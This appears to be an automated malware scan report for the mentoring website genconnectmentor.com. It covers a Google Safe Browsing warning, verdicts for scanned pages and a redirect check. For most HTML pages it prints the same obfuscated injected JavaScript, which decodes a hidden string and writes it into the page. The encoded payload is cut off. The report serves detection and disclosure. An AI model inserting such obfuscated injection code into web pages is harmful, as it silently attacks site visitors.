Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=genconnectmentor.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://genconnectmentor.com/ | 200 OK Content-Length: 25675 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://genconnectmentor.com/who-would-i-be-mentoring.html | 200 OK Content-Length: 28059 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/p7pm/p7popmenu.js | 200 OK Content-Length: 7484 Content-Type: application/x-javascript | clean |
http://genconnectmentor.com/scripts/validation.js | 200 OK Content-Length: 2813 Content-Type: application/x-javascript | clean |
http://genconnectmentor.com/how-can-i-help-as-a-mentor.html | 200 OK Content-Length: 28547 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/what-are-the-qualifications-of-a-genconnect-mentor.html | 200 OK Content-Length: 28510 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/how-do-users-connect-with-a-mentor.html | 200 OK Content-Length: 28873 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/what-are-my-risks-my-rewards.html | 200 OK Content-Length: 29416 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/more-on-genconnect.html | 200 OK Content-Length: 28647 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/editorial-policy.html | 200 OK Content-Length: 28737 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/terms-and-conditions.html | 200 OK Content-Length: 47447 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/privacy-policy.html | 200 OK Content-Length: 35551 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); } function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101- var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); } function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); } } Antivirus reports:
| ||
http://genconnectmentor.com/test404page.js | 404 Not Found Content-Length: 286 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: genconnectmentor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 09:45:51 GMT
Accept-Ranges: bytes
Server: Apache/2.2
Content-Length: 25675
Content-Type: text/html; charset=UTF-8
Last-Modified: Fri, 14 May 2010 10:13:12 GMT
Set-Cookie: X-Mapping-ehkmbajo=16DB65E521303F090C9D40B07FF3DD0E; path=/
...25675 bytes of data.
GET / HTTP/1.1
Host: genconnectmentor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 09:45:51 GMT
Accept-Ranges: bytes
Server: Apache/2.2
Content-Length: 25675
Content-Type: text/html; charset=UTF-8
Last-Modified: Fri, 14 May 2010 10:13:12 GMT
Set-Cookie: X-Mapping-ehkmbajo=16DB65E521303F090C9D40B07FF3DD0E; path=/
...25675 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: genconnectmentor.com
Referer: http://www.google.com/search?q=genconnectmentor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: genconnectmentor.com
Referer: http://www.google.com/search?q=genconnectmentor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.